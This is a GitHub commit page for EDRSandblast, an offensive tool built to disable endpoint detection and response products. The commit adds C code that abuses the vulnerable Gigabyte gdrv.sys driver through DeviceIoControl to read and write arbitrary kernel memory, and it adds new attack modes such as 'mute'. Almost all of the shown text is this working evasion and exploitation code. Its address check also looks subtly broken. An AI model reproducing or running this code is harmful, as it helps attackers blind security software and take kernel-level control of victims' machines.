apply EDRSnowblast patches

BadYug · Sep 29, 2023 · ef6d59f · ef6d59f
1 parent bafddfb
commit ef6d59f
Show file tree

Hide file tree

Showing 36 changed files with 4,469 additions and 2,115 deletions.
diff --git a/EDRSandBlast_README.md b/EDRSandBlast_README.md
diff --git a/EDRSandblast/Drivers/DriverGDRV.c b/EDRSandblast/Drivers/DriverGDRV.c
@@ -0,0 +1,121 @@
+// Details are available here : https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-of-privilege-vulnerabilities/
+#include "DriverGDRV.h"
+#include <windows.h>
+#include <assert.h>
+#include <tchar.h>
+
+#if NO_STRINGS
+#define _putts_or_not(...)
+#define _tprintf_or_not(...)
+#define wprintf_or_not(...)
+#define printf_or_not(...)
+#pragma warning(disable : 4189)
+
+#else
+#define _putts_or_not(...) _putts(__VA_ARGS__)
+#define _tprintf_or_not(...) _tprintf(__VA_ARGS__)
+#define printf_or_not(...) printf(__VA_ARGS__)
+#define wprintf_or_not(...) wprintf(__VA_ARGS__)
+#endif
+
+/*
+* "gdrv.sys" (SHA256: xxx)
+*/
+
+struct GDRV_MEMORY_READ {
+    DWORD64 Dst;
+    DWORD64 Src;
+    DWORD ReadSize;
+};
+
+struct GDRV_MEMORY_WRITE {
+    DWORD64 Dst;
+    DWORD64 Src;
+    DWORD WriteSize;
+};
+
+//#define IOCTL_GIO_MEMCPY 0xC3502808
+static const DWORD GDRV_MEMORY_READ_CODE = 0xC3502808;
+static const DWORD GDRV_MEMORY_WRITE_CODE = 0xC3502808;
+
+HANDLE g_Device_GDRV = INVALID_HANDLE_VALUE;
+HANDLE GetDriverHandle_GDRV() {
+    if (g_Device_GDRV == INVALID_HANDLE_VALUE) {
+        TCHAR service[] = TEXT("\\\\.\\GIO");
+        HANDLE Device = CreateFile(service, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+        if (Device == INVALID_HANDLE_VALUE) {
+            _tprintf_or_not(TEXT("[!] Unable to obtain a handle to the vulnerable driver, exiting...\n"));
+            exit(EXIT_FAILURE);
+        }
+        g_Device_GDRV = Device;
+    }
+    return g_Device_GDRV;
+}
+
+VOID CloseDriverHandle_GDRV() {
+    CloseHandle(g_Device_GDRV);
+    g_Device_GDRV = INVALID_HANDLE_VALUE;
+}
+
+
+VOID ReadMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
+    if (Address < 0x0000800000000000) {
+        _tprintf_or_not(TEXT("Userland address used: 0x%016llx\nThis should not happen, aborting...\n"), Address);
+        exit(1);
+    }
+    if (Address < 0xFFFF800000000000) {
+        _tprintf_or_not(TEXT("Non canonical address used: 0x%016llx\nAborting to avoid a BSOD...\n"), Address);
+        exit(1);
+    }
+    if (Size < sizeof(BYTE) || Size > sizeof(DWORD64)) {
+        _tprintf_or_not(TEXT("Unsupported size for read operation, aborting...\n"));
+        exit(1);
+    }
+    //copy Size bytes from Src to Dest
+    struct GDRV_MEMORY_READ ReadCommand = { 0 };
+    ReadCommand.Src = Address;
+    ReadCommand.Dst = (DWORD64)Buffer;
+    ReadCommand.ReadSize = (DWORD)Size;
+
+    DWORD BytesReturned=0;
+    DeviceIoControl(GetDriverHandle_GDRV(),
+        GDRV_MEMORY_READ_CODE,
+        &ReadCommand,
+        sizeof(ReadCommand),
+        &ReadCommand,
+        sizeof(ReadCommand),
+        &BytesReturned,
+        NULL);
+}
+
+VOID WriteMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
+    if (Address < 0x0000800000000000) {
+        _tprintf_or_not(TEXT("Userland address used: 0x%016llx\nThis should not happen, aborting...\n"), Address);
+        exit(1);
+    }
+    if (Address < 0xFFFF800000000000) {
+        _tprintf_or_not(TEXT("Non canonical address used: 0x%016llx\nAborting to avoid a BSOD...\n"), Address);
+        exit(1);
+    }
+    if (Size < sizeof(BYTE) || Size > sizeof(DWORD64)) {
+        _putts_or_not(TEXT("Unsupported size for read operation, aborting...\n"));
+        exit(1);
+    }
+    //copy Size bytes from Dest to Src
+    struct GDRV_MEMORY_WRITE WriteCommand = { 0 };
+    WriteCommand.Src = (DWORD64)Buffer;
+    WriteCommand.Dst = Address;
+    WriteCommand.WriteSize = (DWORD)Size;
+
+    DWORD BytesReturned = 0;
+    DeviceIoControl(GetDriverHandle_GDRV(),
+        GDRV_MEMORY_WRITE_CODE,
+        &WriteCommand,
+        sizeof(WriteCommand),
+        &WriteCommand,
+        sizeof(WriteCommand),
+        &BytesReturned,
+        NULL);
+}
+
diff --git a/EDRSandblast/EDRSandBlast.h b/EDRSandblast/EDRSandBlast.h
@@ -8,6 +8,9 @@ typedef enum _START_MODE {
     credguard,
     audit,
     firewall,
+    load,
+    mute,
+    fltkd_frames,
     none
 } START_MODE;